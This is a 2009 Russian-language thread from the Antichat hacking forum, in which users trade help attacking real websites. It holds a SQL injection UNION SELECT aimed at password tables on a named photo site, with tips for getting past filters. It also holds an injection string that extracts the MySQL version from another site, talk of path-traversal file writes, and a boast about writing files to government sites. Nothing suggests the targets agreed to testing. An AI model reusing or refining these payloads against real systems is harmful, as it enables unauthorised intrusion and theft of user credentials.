ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.11.2009, 10:33
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
есть ли у кого нибудь эксплойт на Microsoft .NET Framework Version:2.0.50727 Никак не могу найти
|
|
|
20.11.2009, 15:00
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706
Репутация:
-1
|
|
Сообщение от p.r0phe.t
Подскажите, сканер выплюнул:
С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда, ить ток тхт файлы).Редкая довольно-таки вещь.
|
|
|
|
20.11.2009, 15:25
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
Сообщение от GenTao
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда, ить ток тхт файлы).Редкая довольно-таки вещь.
Причём тут ХТТП? оО
Какие ошибки нумеровать? ты о чём?
|
|
|
|
20.11.2009, 16:40
|
|
Новичок
Регистрация: 10.01.2007
Сообщений: 16
Провел на форуме:
109680
Репутация:
2
|
|
http://www.pngbd.com/photos/showgallery.php?cat=999%27%29+UNION+SELECT+1,passw ord,3,4+from+matryx_photos.users%23
видимо стоят фильтры на password,users итд есть идеи как обойти?
|
|
|
|
20.11.2009, 17:25
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Емпти сет. Эта табличка пустая
999')+UNION+SELECT+1,count(*),3,4+from+users--+
Кстати рега происходит в булке, а не в этом PhotoPost. Видимо база юзеров хранится там.
|
|
|
|
20.11.2009, 17:26
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
|
|
|
|
20.11.2009, 17:40
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от Spyder
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
я думаю речь идет не про метод PUT, а про фтпшную комманду PUT и суть уязвимости в том, что с помощью ../../ можно выйти из родительского каталога и записать файл ну например в корень серва, если конечно права позволят, это мое предположение и я могу ошибаться
__________________
Карфаген должен быть разрушен...
|
|
|
|
20.11.2009, 17:55
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
ребята, после изучений нескольких статей, хотел пробовать в деле, и в одном сайте по запросу:
Код:
http://www.site.ru/vn84.php?id=’ OR ’1’=’1’
Выдает такая ошибка:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '™ OR ’1’=’1В’ AND status = '1'' at line 2
на сколько это серьезная ошибка и можно ли раскрутить это дальше ?
а если например перенаправить (http://www.site.ru/vn84.php?id=http://www.ya.ru/) на yandex.ru, то получается такая ошибка:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.ya.ru/ AND status = '1'' at line 2
|
|
|
|
20.11.2009, 18:06
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
2B1t.exe
Код:
id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,version())+--+
мне кажется там можно замутить инклюд или читалку файлов
__________________
Карфаген должен быть разрушен...
|
|
|
|
20.11.2009, 18:10
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Scipio
угу. теперь вроде версия да появился ?
Код:
http://www.site.ru/vn84.php?id=id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14, concat(0x27,version())+--+
выдает:
Код:
error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '4.1.22'' at line 2
получется иммем MySQL версии 4.1.22 ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
